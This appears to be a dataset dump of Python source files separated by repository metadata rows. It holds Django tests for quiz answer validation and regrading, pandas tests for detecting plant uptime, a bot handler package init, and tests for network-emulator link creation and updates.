def test_validate_regrade_float_correct_answer(self):
# Given
float_answer = 99.9
self.answer = Answer(question=self.question1,
answer=float_answer,
)
self.answer.save()
self.answerpaper.answers.add(self.answer)
# When
json_data = None
result = self.answerpaper.validate_answer(float_answer,
self.question1,
json_data,
)
# Then
self.assertTrue(result['success'])
# Regrade with wrong answer
# Given
regrade_answer = Answer.objects.get(id=self.answer.id)
regrade_answer.answer = 0.0
regrade_answer.save()
# When
details = self.answerpaper.regrade(self.question1.id)
# Then
self.answer = self.answerpaper.answers.filter(question=self.question1
).last()
self.assertEqual(self.answer, regrade_answer)
self.assertTrue(details[0])
self.assertEqual(self.answer.marks, 0)
self.assertFalse(self.answer.correct)
def test_float_incorrect_answer(self):
# Given
float_answer = 99.8
self.answer = Answer(question=self.question1,
answer=float_answer,
)
self.answer.save()
self.answerpaper.answers.add(self.answer)
# When
json_data = None
result = self.answerpaper.validate_answer(float_answer,
self.question1, json_data
)
# Then
self.assertFalse(result['success'])
# Regrade
# Given
regrade_answer = Answer.objects.get(id=self.answer.id)
regrade_answer.answer = 99.9
regrade_answer.save()
# When
details = self.answerpaper.regrade(self.question1.id)
# Then
self.answer = self.answerpaper.answers.filter(question=self.question1
).last()
self.assertEqual(self.answer, regrade_answer)
self.assertTrue(details[0])
self.assertEqual(self.answer.marks, 1)
self.assertTrue(self.answer.correct)
class MCQQuestionTestCases(unittest.TestCase):
@classmethod
def setUpClass(self):
# Creating User
self.user = User.objects.get(username='demo_user_100')
self.user2 = User.objects.get(username='demo_user_101')
self.user_ip = '127.0.0.1'
# Creating Course
self.course = Course.objects.get(name="Python Course 100")
# Creating Quiz
self.quiz = Quiz.objects.get(description="demo quiz 100")
# Creating Question paper
self.question_paper = QuestionPaper.objects.get(quiz=self.quiz)
self.question_paper.shuffle_testcases = True
self.question_paper.save()
# Creating Question
self.question1 = Question.objects.create(summary='mcq1', points=1,
type='code', user=self.user,
)
self.question1.language = 'python'
self.question1.type = "mcq"
self.question1.test_case_type = 'Mcqtestcase'
self.question1.description = 'Which option is Correct?'
self.question1.save()
# For questions
self.mcq_based_testcase_1 = McqTestCase(question=self.question1,
options="Correct",
correct=True,
type='mcqtestcase',
)
self.mcq_based_testcase_1.save()
self.mcq_based_testcase_2 = McqTestCase(question=self.question1,
options="Incorrect",
correct=False,
type='mcqtestcase',
)
self.mcq_based_testcase_2.save()
self.mcq_based_testcase_3 = McqTestCase(question=self.question1,
options="Incorrect",
correct=False,
type='mcqtestcase',
)
self.mcq_based_testcase_3.save()
self.mcq_based_testcase_4 = McqTestCase(question=self.question1,
options="Incorrect",
correct=False,
type='mcqtestcase',
)
self.mcq_based_testcase_4.save()
self.question_paper.fixed_questions.add(self.question1)
self.answerpaper = self.question_paper.make_answerpaper(
user=self.user, ip=self.user_ip,
attempt_num=1,
course_id=self.course.id
)
# Answerpaper for user 2
self.answerpaper2 = self.question_paper.make_answerpaper(
user=self.user2, ip=self.user_ip,
attempt_num=1,
course_id=self.course.id
)
@classmethod
def tearDownClass(self):
self.question1.delete()
self.answerpaper.delete()
self.answerpaper2.delete()
def test_shuffle_test_cases(self):
# Given
# When
user_testcase = self.question1.get_ordered_test_cases(
self.answerpaper
)
order1 = [tc.id for tc in user_testcase]
user2_testcase = self.question1.get_ordered_test_cases(
self.answerpaper2
)
order2 = [tc.id for tc in user2_testcase]
self.question_paper.shuffle_testcases = False
self.question_paper.save()
answerpaper3 = self.question_paper.make_answerpaper(
user=self.user2, ip=self.user_ip,
attempt_num=self.answerpaper.attempt_number+1,
course_id=self.course.id
)
not_ordered_testcase = self.question1.get_ordered_test_cases(
answerpaper3
)
get_test_cases = self.question1.get_test_cases()
# Then
self.assertNotEqual(order1, order2)
self.assertEqual(get_test_cases, not_ordered_testcase)
class ArrangeQuestionTestCases(unittest.TestCase):
@classmethod
def setUpClass(self):
# Creating Course
self.course = Course.objects.get(name="Python Course 100")
# Creating Quiz
self.quiz = Quiz.objects.get(description="demo quiz 100")
# Creating Question paper
self.question_paper = QuestionPaper.objects.get(quiz=self.quiz,
total_marks=1.0)
# Creating User
self.user = User.objects.get(username='demo_user_100')
# Creating Question
self.question1 = Question.objects.create(summary='arrange1',
points=1.0,
user=self.user
)
self.question1.language = 'python'
self.question1.type = "arrange"
self.question1.description = "Arrange alphabets in ascending order"
self.question1.test_case_type = 'arrangetestcase'
self.question1.save()
# Creating answerpaper
self.answerpaper = AnswerPaper.objects.create(
user=self.user, user_ip='101.0.0.1', course=self.course,
start_time=timezone.now(), question_paper=self.question_paper,
end_time=timezone.now()+timedelta(minutes=5), attempt_number=1
)
self.answerpaper.questions.add(self.question1)
self.answerpaper.save()
# For question
self.arrange_testcase_1 = ArrangeTestCase(question=self.question1,
options="A",
type='arrangetestcase',
)
self.arrange_testcase_1.save()
self.testcase_1_id = self.arrange_testcase_1.id
self.arrange_testcase_2 = ArrangeTestCase(question=self.question1,
options="B",
type='arrangetestcase',
)
self.arrange_testcase_2.save()
self.testcase_2_id = self.arrange_testcase_2.id
self.arrange_testcase_3 = ArrangeTestCase(question=self.question1,
options="C",
type='arrangetestcase',
)
self.arrange_testcase_3.save()
self.testcase_3_id = self.arrange_testcase_3.id
@classmethod
def tearDownClass(self):
self.question1.delete()
self.answerpaper.delete()
def test_validate_regrade_arrange_correct_answer(self):
# Given
arrange_answer = [self.testcase_1_id,
self.testcase_2_id,
self.testcase_3_id,
]
self.answer = Answer(question=self.question1,
answer=arrange_answer,
)
self.answer.save()
self.answerpaper.answers.add(self.answer)
# When
json_data = None
result = self.answerpaper.validate_answer(arrange_answer,
self.question1,
json_data,
)
# Then
self.assertTrue(result['success'])
# Regrade with wrong answer
# Given
regrade_answer = Answer.objects.get(id=self.answer.id)
# Try regrade with wrong data structure
# When
regrade_answer.answer = 1
regrade_answer.save()
details = self.answerpaper.regrade(self.question1.id)
err_msg = dedent("""\
User: {0}; Quiz: {1}; Question: {2}.
{3} answer not a list.""".format(
self.user.username,
self.quiz.description,
self.question1.summary,
self.question1.type
))
self.assertFalse(details[0])
self.assertEqual(details[1], err_msg)
# Try regrade with incorrect answer
# When
regrade_answer.answer = [self.testcase_1_id,
self.testcase_3_id,
self.testcase_2_id,
]
regrade_answer.save()
# Then
details = self.answerpaper.regrade(self.question1.id)
self.answer = self.answerpaper.answers.filter(question=self.question1
).last()
self.assertEqual(self.answer, regrade_answer)
self.assertTrue(details[0])
self.assertEqual(self.answer.marks, 0)
self.assertFalse(self.answer.correct)
def test_validate_regrade_arrange_incorrect_answer(self):
# Given
arrange_answer = [self.testcase_1_id,
self.testcase_3_id,
self.testcase_2_id,
]
self.answer = Answer(question=self.question1,
answer=arrange_answer,
)
self.answer.save()
self.answerpaper.answers.add(self.answer)
# When
json_data = None
result = self.answerpaper.validate_answer(arrange_answer,
self.question1, json_data
)
# Then
self.assertFalse(result['success'])
# Regrade with wrong answer
# Given
regrade_answer = Answer.objects.get(id=self.answer.id)
regrade_answer.answer = [self.testcase_1_id,
self.testcase_2_id,
self.testcase_3_id,
]
regrade_answer.save()
# When
details = self.answerpaper.regrade(self.question1.id)
# Then
self.answer = self.answerpaper.answers.filter(question=self.question1
).last()
self.assertEqual(self.answer, regrade_answer)
self.assertTrue(details[0])
self.assertEqual(self.answer.marks, 1)
self.assertTrue(self.answer.correct)
class MCQShuffleTestCases(unittest.TestCase):
@classmethod
def setUpClass(self):
# Creating User
self.user = User.objects.get(username='demo_user_100')
self.user2 = User.objects.get(username='demo_user_101')
self.user_ip = '127.0.0.1'
# Creating Course
self.course = Course.objects.get(name="Python Course 100")
# Creating Quiz
self.quiz = Quiz.objects.get(description="demo quiz 100")
# Creating Question paper
self.question_paper = QuestionPaper.objects.get(quiz=self.quiz)
self.question_paper.shuffle_testcases = True
self.question_paper.save()
# Creating Question
self.question1 = Question.objects.create(summary='mcq1', points=1,
type='code', user=self.user,
)
self.question1.language = 'python'
self.question1.type = "mcq"
self.question1.test_case_type = 'Mcqtestcase'
self.question1.description = 'Which option is Correct?'
self.question1.save()
# For questions
self.mcq_based_testcase_1 = McqTestCase(question=self.question1,
options="Correct",
correct=True,
type='mcqtestcase',
)
self.mcq_based_testcase_1.save()
self.mcq_based_testcase_2 = McqTestCase(question=self.question1,
options="Incorrect",
correct=False,
type='mcqtestcase',
)
self.mcq_based_testcase_2.save()
self.mcq_based_testcase_3 = McqTestCase(question=self.question1,
options="Incorrect",
correct=False,
type='mcqtestcase',
)
self.mcq_based_testcase_3.save()
self.mcq_based_testcase_4 = McqTestCase(question=self.question1,
options="Incorrect",
correct=False,
type='mcqtestcase',
)
self.mcq_based_testcase_4.save()
self.question_paper.fixed_questions.add(self.question1)
self.answerpaper = self.question_paper.make_answerpaper(
user=self.user, ip=self.user_ip,
attempt_num=1,
course_id=self.course.id
)
# Answerpaper for user 2
self.answerpaper2 = self.question_paper.make_answerpaper(
user=self.user2, ip=self.user_ip,
attempt_num=1,
course_id=self.course.id
)
@classmethod
def tearDownClass(self):
self.question1.delete()
self.answerpaper.delete()
self.answerpaper2.delete()
def test_shuffle_test_cases(self):
# Given
# When
user_testcase = self.question1.get_ordered_test_cases(
self.answerpaper
)
order1 = [tc.id for tc in user_testcase]
user2_testcase = self.question1.get_ordered_test_cases(
self.answerpaper2
)
order2 = [tc.id for tc in user2_testcase]
self.question_paper.shuffle_testcases = False
self.question_paper.save()
answerpaper3 = self.question_paper.make_answerpaper(
user=self.user2, ip=self.user_ip,
attempt_num=self.answerpaper.attempt_number+1,
course_id=self.course.id
)
not_ordered_testcase = self.question1.get_ordered_test_cases(
answerpaper3
)
get_test_cases = self.question1.get_test_cases()
# Then
self.assertNotEqual(order1, order2)
self.assertEqual(get_test_cases, not_ordered_testcase)
answerpaper3.delete()
| 39.831731
| 78
| 0.517019
| 2,954
| 33,140
| 5.644888
| 0.06872
| 0.081079
| 0.045337
| 0.01919
| 0.877841
| 0.833223
| 0.821589
| 0.801379
| 0.792864
| 0.786447
| 0
| 0.021824
| 0.39994
| 33,140
| 831
| 79
| 39.879663
| 0.816705
| 0.040797
| 0
| 0.693739
| 0
| 0
| 0.046333
| 0
| 0
| 0
| 0
| 0
| 0.094755
| 1
| 0.043993
| false
| 0.005076
| 0.010152
| 0
| 0.064298
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
f7f5953df70a457cdcfa1364dcff1a4ea0d3973b
| 4,490
|
py
|
Python
|
tests/features/test_build_features.py
|
catalyst-cooperative/epacems_ramp_rates
|
5a5ea6f9571823f7ef3f9c66abb4d9acb79820be
|
[
"MIT"
] | 1
|
2021-07-02T15:31:22.000Z
|
2021-07-02T15:31:22.000Z
|
tests/features/test_build_features.py
|
catalyst-cooperative/epacems_ramp_rates
|
5a5ea6f9571823f7ef3f9c66abb4d9acb79820be
|
[
"MIT"
] | 4
|
2021-07-30T19:42:10.000Z
|
2021-08-16T19:12:21.000Z
|
tests/features/test_build_features.py
|
catalyst-cooperative/epacems_ramp_rates
|
5a5ea6f9571823f7ef3f9c66abb4d9acb79820be
|
[
"MIT"
] | null | null | null |
import pytest
import pandas as pd
import numpy as np
from ramprate.build_features import _find_uptime
def test__find_uptime_start_and_end_nonzero():
dt_idx = pd.date_range(start="2020-01-01 00:00", periods=6, freq="h", tz="UTC")
data = [2, 2, 0, 0, 0, 2]
# downtime=True
# first zero after non-zero
shutdown = pd.to_datetime(["2020-01-01 02:00"], utc=True)
# last zero before non-zero
startup = pd.to_datetime(["2020-01-01 04:00"], utc=True)
expected = pd.DataFrame({"shutdown": shutdown, "startup": startup})
actual = _find_uptime(pd.Series(data, index=dt_idx), downtime=True)
pd.testing.assert_frame_equal(actual, expected)
# end points ('startup') are after start points ('shutdown')
assert actual.diff(axis=1)["startup"].dt.total_seconds().fillna(1).ge(0).all()
# downtime=False
# last zero before non-zero
startup = pd.to_datetime([pd.NaT, "2020-01-01 04:00"], utc=True)
# first zero after non-zero
shutdown = pd.to_datetime(["2020-01-01 02:00", pd.NaT], utc=True)
expected = pd.DataFrame({"startup": startup, "shutdown": shutdown})
actual = _find_uptime(pd.Series(data, index=dt_idx))
pd.testing.assert_frame_equal(actual, expected)
# end points ('shutdown') are after start points ('startup')
assert actual.diff(axis=1)["shutdown"].dt.total_seconds().fillna(1).ge(0).all()
def test__find_uptime_all_zeros():
dt_idx = pd.date_range(start="2020-01-01 00:00", periods=6, freq="h", tz="UTC")
data = [0, 0, 0, 0, 0, 0]
# downtime=True
# first zero after non-zero
shutdown = pd.to_datetime([pd.NaT], utc=True)
# last zero before non-zero
startup = pd.to_datetime([pd.NaT], utc=True)
expected = pd.DataFrame({"shutdown": shutdown, "startup": startup})
actual = _find_uptime(pd.Series(data, index=dt_idx), downtime=True)
pd.testing.assert_frame_equal(actual, expected)
# downtime=False
# first zero after non-zero
shutdown = pd.to_datetime([], utc=True)
# last zero before non-zero
startup = pd.to_datetime([], utc=True)
expected = pd.DataFrame({"startup": startup, "shutdown": shutdown})
actual = _find_uptime(pd.Series(data, index=dt_idx))
pd.testing.assert_frame_equal(actual, expected)
def test__find_uptime_no_zeros():
dt_idx = pd.date_range(start="2020-01-01 00:00", periods=6, freq="h", tz="UTC")
data = [5, 5, 5, 5, 5, 5]
# downtime=True
# first zero after non-zero
shutdown = pd.to_datetime([], utc=True)
# last zero before non-zero
startup = pd.to_datetime([], utc=True)
expected = pd.DataFrame({"shutdown": shutdown, "startup": startup})
actual = _find_uptime(pd.Series(data, index=dt_idx), downtime=True)
pd.testing.assert_frame_equal(actual, expected)
# downtime=False
# first zero after non-zero
shutdown = pd.to_datetime([pd.NaT], utc=True)
# last zero before non-zero
startup = pd.to_datetime([pd.NaT], utc=True)
expected = pd.DataFrame({"startup": startup, "shutdown": shutdown})
actual = _find_uptime(pd.Series(data, index=dt_idx))
pd.testing.assert_frame_equal(actual, expected)
def test__find_uptime_start_zero_end_zero():
dt_idx = pd.date_range(start="2020-01-01 00:00", periods=6, freq="h", tz="UTC")
data = [0, 2, 2, 0, 2, 0]
# downtime=True
# first zero after non-zero
shutdown = pd.to_datetime([pd.NaT, "2020-01-01 03:00", "2020-01-01 05:00"], utc=True)
# last zero before non-zero
startup = pd.to_datetime(["2020-01-01 00:00", "2020-01-01 03:00", pd.NaT], utc=True)
expected = pd.DataFrame({"shutdown": shutdown, "startup": startup})
actual = _find_uptime(pd.Series(data, index=dt_idx), downtime=True)
pd.testing.assert_frame_equal(actual, expected)
# end points ('startup') are after start points ('shutdown')
assert actual.diff(axis=1)["startup"].dt.total_seconds().fillna(1).ge(0).all()
# downtime=False
# last zero before non-zero
startup = pd.to_datetime(["2020-01-01 00:00", "2020-01-01 03:00"], utc=True)
# first zero after non-zero
shutdown = pd.to_datetime(["2020-01-01 03:00", "2020-01-01 05:00"], utc=True)
expected = pd.DataFrame({"startup": startup, "shutdown": shutdown})
actual = _find_uptime(pd.Series(data, index=dt_idx))
pd.testing.assert_frame_equal(actual, expected)
# end points ('shutdown') are after start points ('startup')
assert actual.diff(axis=1)["shutdown"].dt.total_seconds().fillna(1).ge(0).all()
| 42.358491
| 89
| 0.675724
| 689
| 4,490
| 4.265602
| 0.108853
| 0.032664
| 0.043552
| 0.046274
| 0.952365
| 0.939775
| 0.939775
| 0.937734
| 0.935012
| 0.935012
| 0
| 0.061916
| 0.165479
| 4,490
| 105
| 90
| 42.761905
| 0.722445
| 0.170824
| 0
| 0.666667
| 0
| 0
| 0.114239
| 0
| 0
| 0
| 0
| 0
| 0.2
| 1
| 0.066667
| false
| 0
| 0.066667
| 0
| 0.133333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
79072ecbaf7146f0b35ba3fb0dc12f5ddb30f1d3
| 506
|
py
|
Python
|
nexus/bot/handlers/__init__.py
|
RobbiNespu/hyperboria
|
7db858386f1a20e8d49bc16f53bfd7f1e4d03f7e
|
[
"Unlicense"
] | 54
|
2021-01-07T03:02:36.000Z
|
2022-03-28T17:19:29.000Z
|
nexus/bot/handlers/__init__.py
|
the-superpirate/hyperboria
|
74776166158d07b199677f9738862e5f1fa54367
|
[
"Unlicense"
] | 10
|
2021-01-08T17:38:59.000Z
|
2022-02-28T14:34:45.000Z
|
nexus/bot/handlers/__init__.py
|
the-superpirate/hyperboria
|
74776166158d07b199677f9738862e5f1fa54367
|
[
"Unlicense"
] | 16
|
2020-12-28T18:31:44.000Z
|
2022-02-22T15:00:53.000Z
|
from . import (
admin,
ban,
close,
contact,
copyright,
donate,
download,
emoji,
help,
legacy,
noop,
roll,
search,
settings,
shortlink,
start,
stop,
submit,
top_missed,
view,
vote,
)
__all__ = ['admin', 'ban', 'contact', 'copyright', 'close', 'donate', 'download', 'emoji', 'help',
'legacy', 'noop', 'roll', 'search', 'settings',
'shortlink', 'start', 'stop', 'submit', 'top_missed', 'view', 'vote']
| 18.071429
| 98
| 0.51581
| 47
| 506
| 5.425532
| 0.531915
| 0.062745
| 0.14902
| 0.180392
| 0.721569
| 0.721569
| 0.721569
| 0.721569
| 0.721569
| 0.721569
| 0
| 0
| 0.3083
| 506
| 27
| 99
| 18.740741
| 0.728571
| 0
| 0
| 0
| 0
| 0
| 0.241107
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.038462
| 0
| 0.038462
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
791eb77a671c04392a73a95336ef324cf0637fdf
| 12,670
|
py
|
Python
|
daemon/tests/test_links.py
|
alehmannFRA-UAS/core
|
bcf74297851e40e383c279f1f0a7eff3257c258b
|
[
"BSD-2-Clause"
] | 3
|
2022-03-14T21:53:08.000Z
|
2022-03-14T21:54:18.000Z
|
daemon/tests/test_links.py
|
alehmannFRA-UAS/core
|
bcf74297851e40e383c279f1f0a7eff3257c258b
|
[
"BSD-2-Clause"
] | null | null | null |
daemon/tests/test_links.py
|
alehmannFRA-UAS/core
|
bcf74297851e40e383c279f1f0a7eff3257c258b
|
[
"BSD-2-Clause"
] | null | null | null |
from typing import Tuple
import pytest
from core.emulator.data import IpPrefixes, LinkOptions
from core.emulator.session import Session
from core.errors import CoreError
from core.nodes.base import CoreNode
from core.nodes.network import SwitchNode
INVALID_ID: int = 100
LINK_OPTIONS: LinkOptions = LinkOptions(
delay=50, bandwidth=5000000, loss=25, dup=25, jitter=10, buffer=100
)
def create_ptp_network(
session: Session, ip_prefixes: IpPrefixes
) -> Tuple[CoreNode, CoreNode]:
# create nodes
node1 = session.add_node(CoreNode)
node2 = session.add_node(CoreNode)
# link nodes to net node
iface1_data = ip_prefixes.create_iface(node1)
iface2_data = ip_prefixes.create_iface(node2)
session.add_link(node1.id, node2.id, iface1_data, iface2_data)
# instantiate session
session.instantiate()
return node1, node2
class TestLinks:
def test_add_node_to_node(self, session: Session, ip_prefixes: IpPrefixes):
# given
node1 = session.add_node(CoreNode)
node2 = session.add_node(CoreNode)
iface1_data = ip_prefixes.create_iface(node1)
iface2_data = ip_prefixes.create_iface(node2)
# when
iface1, iface2 = session.add_link(
node1.id, node2.id, iface1_data, iface2_data, options=LINK_OPTIONS
)
# then
assert node1.get_iface(iface1_data.id)
assert node2.get_iface(iface2_data.id)
assert iface1 is not None
assert iface2 is not None
assert iface1.local_options == LINK_OPTIONS
assert iface1.has_local_netem
assert iface2.local_options == LINK_OPTIONS
assert iface2.has_local_netem
def test_add_node_to_net(self, session: Session, ip_prefixes: IpPrefixes):
# given
node1 = session.add_node(CoreNode)
node2 = session.add_node(SwitchNode)
iface1_data = ip_prefixes.create_iface(node1)
# when
iface, _ = session.add_link(
node1.id, node2.id, iface1_data=iface1_data, options=LINK_OPTIONS
)
# then
assert node2.links()
assert node1.get_iface(iface1_data.id)
assert iface is not None
assert iface.local_options == LINK_OPTIONS
assert iface.has_local_netem
def test_add_net_to_node(self, session: Session, ip_prefixes: IpPrefixes):
# given
node1 = session.add_node(SwitchNode)
node2 = session.add_node(CoreNode)
iface2_data = ip_prefixes.create_iface(node2)
# when
_, iface = session.add_link(
node1.id, node2.id, iface2_data=iface2_data, options=LINK_OPTIONS
)
# then
assert node1.links()
assert node2.get_iface(iface2_data.id)
assert iface is not None
assert iface.local_options == LINK_OPTIONS
assert iface.has_local_netem
def test_add_net_to_net(self, session):
# given
node1 = session.add_node(SwitchNode)
node2 = session.add_node(SwitchNode)
# when
iface, _ = session.add_link(node1.id, node2.id, options=LINK_OPTIONS)
# then
assert node1.links()
assert iface is not None
assert iface.local_options == LINK_OPTIONS
assert iface.options == LINK_OPTIONS
assert iface.has_local_netem
assert iface.has_netem
def test_add_node_to_node_uni(self, session: Session, ip_prefixes: IpPrefixes):
# given
node1 = session.add_node(CoreNode)
node2 = session.add_node(CoreNode)
iface1_data = ip_prefixes.create_iface(node1)
iface2_data = ip_prefixes.create_iface(node2)
link_options1 = LinkOptions(
delay=50,
bandwidth=5000000,
loss=25,
dup=25,
jitter=10,
buffer=100,
unidirectional=True,
)
link_options2 = LinkOptions(
delay=51,
bandwidth=5000001,
loss=26,
dup=26,
jitter=11,
buffer=101,
unidirectional=True,
)
# when
iface1, iface2 = session.add_link(
node1.id, node2.id, iface1_data, iface2_data, link_options1
)
session.update_link(
node2.id, node1.id, iface2_data.id, iface1_data.id, link_options2
)
# then
assert node1.get_iface(iface1_data.id)
assert node2.get_iface(iface2_data.id)
assert iface1 is not None
assert iface2 is not None
assert iface1.local_options == link_options1
assert iface1.has_local_netem
assert iface2.local_options == link_options2
assert iface2.has_local_netem
def test_update_node_to_net(self, session: Session, ip_prefixes: IpPrefixes):
# given
node1 = session.add_node(CoreNode)
node2 = session.add_node(SwitchNode)
iface1_data = ip_prefixes.create_iface(node1)
iface1, _ = session.add_link(node1.id, node2.id, iface1_data)
assert iface1.local_options != LINK_OPTIONS
# when
session.update_link(
node1.id, node2.id, iface1_id=iface1_data.id, options=LINK_OPTIONS
)
# then
assert iface1.local_options == LINK_OPTIONS
assert iface1.has_local_netem
def test_update_net_to_node(self, session: Session, ip_prefixes: IpPrefixes):
# given
node1 = session.add_node(SwitchNode)
node2 = session.add_node(CoreNode)
iface2_data = ip_prefixes.create_iface(node2)
_, iface2 = session.add_link(node1.id, node2.id, iface2_data=iface2_data)
assert iface2.local_options != LINK_OPTIONS
# when
session.update_link(
node1.id, node2.id, iface2_id=iface2_data.id, options=LINK_OPTIONS
)
# then
assert iface2.local_options == LINK_OPTIONS
assert iface2.has_local_netem
def test_update_ptp(self, session: Session, ip_prefixes: IpPrefixes):
# given
node1 = session.add_node(CoreNode)
node2 = session.add_node(CoreNode)
iface1_data = ip_prefixes.create_iface(node1)
iface2_data = ip_prefixes.create_iface(node2)
iface1, iface2 = session.add_link(node1.id, node2.id, iface1_data, iface2_data)
assert iface1.local_options != LINK_OPTIONS
assert iface2.local_options != LINK_OPTIONS
# when
session.update_link(
node1.id, node2.id, iface1_data.id, iface2_data.id, LINK_OPTIONS
)
# then
assert iface1.local_options == LINK_OPTIONS
assert iface1.has_local_netem
assert iface2.local_options == LINK_OPTIONS
assert iface2.has_local_netem
def test_update_net_to_net(self, session: Session, ip_prefixes: IpPrefixes):
# given
node1 = session.add_node(SwitchNode)
node2 = session.add_node(SwitchNode)
iface1, _ = session.add_link(node1.id, node2.id)
assert iface1.local_options != LINK_OPTIONS
# when
session.update_link(node1.id, node2.id, options=LINK_OPTIONS)
# then
assert iface1.local_options == LINK_OPTIONS
assert iface1.has_local_netem
assert iface1.options == LINK_OPTIONS
assert iface1.has_netem
def test_clear_net_to_net(self, session: Session, ip_prefixes: IpPrefixes):
# given
node1 = session.add_node(SwitchNode)
node2 = session.add_node(SwitchNode)
iface1, _ = session.add_link(node1.id, node2.id, options=LINK_OPTIONS)
assert iface1.local_options == LINK_OPTIONS
assert iface1.has_local_netem
assert iface1.options == LINK_OPTIONS
assert iface1.has_netem
# when
options = LinkOptions(delay=0, bandwidth=0, loss=0.0, dup=0, jitter=0, buffer=0)
session.update_link(node1.id, node2.id, options=options)
# then
assert iface1.local_options.is_clear()
assert not iface1.has_local_netem
assert iface1.options.is_clear()
assert not iface1.has_netem
def test_delete_node_to_node(self, session: Session, ip_prefixes: IpPrefixes):
# given
node1 = session.add_node(CoreNode)
node2 = session.add_node(CoreNode)
iface1_data = ip_prefixes.create_iface(node1)
iface2_data = ip_prefixes.create_iface(node2)
session.add_link(node1.id, node2.id, iface1_data, iface2_data)
assert node1.get_iface(iface1_data.id)
assert node2.get_iface(iface2_data.id)
# when
session.delete_link(node1.id, node2.id, iface1_data.id, iface2_data.id)
# then
assert iface1_data.id not in node1.ifaces
assert iface2_data.id not in node2.ifaces
def test_delete_node_to_net(self, session: Session, ip_prefixes: IpPrefixes):
# given
node1 = session.add_node(CoreNode)
node2 = session.add_node(SwitchNode)
iface1_data = ip_prefixes.create_iface(node1)
session.add_link(node1.id, node2.id, iface1_data)
assert node1.get_iface(iface1_data.id)
# when
session.delete_link(node1.id, node2.id, iface1_id=iface1_data.id)
# then
assert iface1_data.id not in node1.ifaces
def test_delete_net_to_node(self, session: Session, ip_prefixes: IpPrefixes):
# given
node1 = session.add_node(SwitchNode)
node2 = session.add_node(CoreNode)
iface2_data = ip_prefixes.create_iface(node2)
session.add_link(node1.id, node2.id, iface2_data=iface2_data)
assert node2.get_iface(iface2_data.id)
# when
session.delete_link(node1.id, node2.id, iface2_id=iface2_data.id)
# then
assert iface2_data.id not in node2.ifaces
def test_delete_net_to_net(self, session: Session, ip_prefixes: IpPrefixes):
# given
node1 = session.add_node(SwitchNode)
node2 = session.add_node(SwitchNode)
session.add_link(node1.id, node2.id)
assert node1.get_linked_iface(node2)
# when
session.delete_link(node1.id, node2.id)
# then
assert not node1.get_linked_iface(node2)
def test_delete_node_error(self, session: Session, ip_prefixes: IpPrefixes):
# given
node1 = session.add_node(SwitchNode)
node2 = session.add_node(SwitchNode)
session.add_link(node1.id, node2.id)
assert node1.get_linked_iface(node2)
# when
with pytest.raises(CoreError):
session.delete_link(node1.id, INVALID_ID)
with pytest.raises(CoreError):
session.delete_link(INVALID_ID, node2.id)
def test_delete_net_to_net_error(self, session: Session, ip_prefixes: IpPrefixes):
# given
node1 = session.add_node(SwitchNode)
node2 = session.add_node(SwitchNode)
node3 = session.add_node(SwitchNode)
session.add_link(node1.id, node2.id)
assert node1.get_linked_iface(node2)
# when
with pytest.raises(CoreError):
session.delete_link(node1.id, node3.id)
def test_delete_node_to_net_error(self, session: Session, ip_prefixes: IpPrefixes):
# given
node1 = session.add_node(CoreNode)
node2 = session.add_node(SwitchNode)
node3 = session.add_node(SwitchNode)
iface1_data = ip_prefixes.create_iface(node1)
iface1, _ = session.add_link(node1.id, node2.id, iface1_data)
assert iface1
# when
with pytest.raises(CoreError):
session.delete_link(node1.id, node3.id)
def test_delete_net_to_node_error(self, session: Session, ip_prefixes: IpPrefixes):
# given
node1 = session.add_node(SwitchNode)
node2 = session.add_node(CoreNode)
node3 = session.add_node(SwitchNode)
iface2_data = ip_prefixes.create_iface(node2)
_, iface2 = session.add_link(node1.id, node2.id, iface2_data=iface2_data)
assert iface2
# when
with pytest.raises(CoreError):
session.delete_link(node1.id, node3.id)
def test_delete_node_to_node_error(self, session: Session, ip_prefixes: IpPrefixes):
# given
node1 = session.add_node(CoreNode)
node2 = session.add_node(CoreNode)
node3 = session.add_node(SwitchNode)
iface1_data = ip_prefixes.create_iface(node1)
iface2_data = ip_prefixes.create_iface(node2)
iface1, iface2 = session.add_link(node1.id, node2.id, iface1_data, iface2_data)
assert iface1
assert iface2
# when
with pytest.raises(CoreError):
session.delete_link(node1.id, node3.id)
| 34.523161
| 88
| 0.658879
| 1,585
| 12,670
| 5.008202
| 0.05489
| 0.080625
| 0.077601
| 0.058453
| 0.90514
| 0.894558
| 0.875787
| 0.853993
| 0.823003
| 0.80839
| 0
| 0.038302
| 0.260221
| 12,670
| 366
| 89
| 34.617486
| 0.808599
| 0.026361
| 0
| 0.624
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.292
| 1
| 0.08
| false
| 0
| 0.028
| 0
| 0.116
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
792b2e276d9654b59ec6ab9f9fb6f45f7f8145c7
| 7,761
|
py
|
Python
|
tests/test_dynamo_event.py
|
wellcomecollection/aws_utils
|
b2c54b44fcd7edf9877903f1b0ef1aba853926c3
|
[
"MIT"
] | null | null | null |
tests/test_dynamo_event.py
|
wellcomecollection/aws_utils
|
b2c54b44fcd7edf9877903f1b0ef1aba853926c3
|
[
"MIT"
] | 8
|
2017-11-07T15:44:42.000Z
|
2019-07-25T16:35:00.000Z
|
tests/test_dynamo_event.py
|
wellcomecollection/aws_utils
|
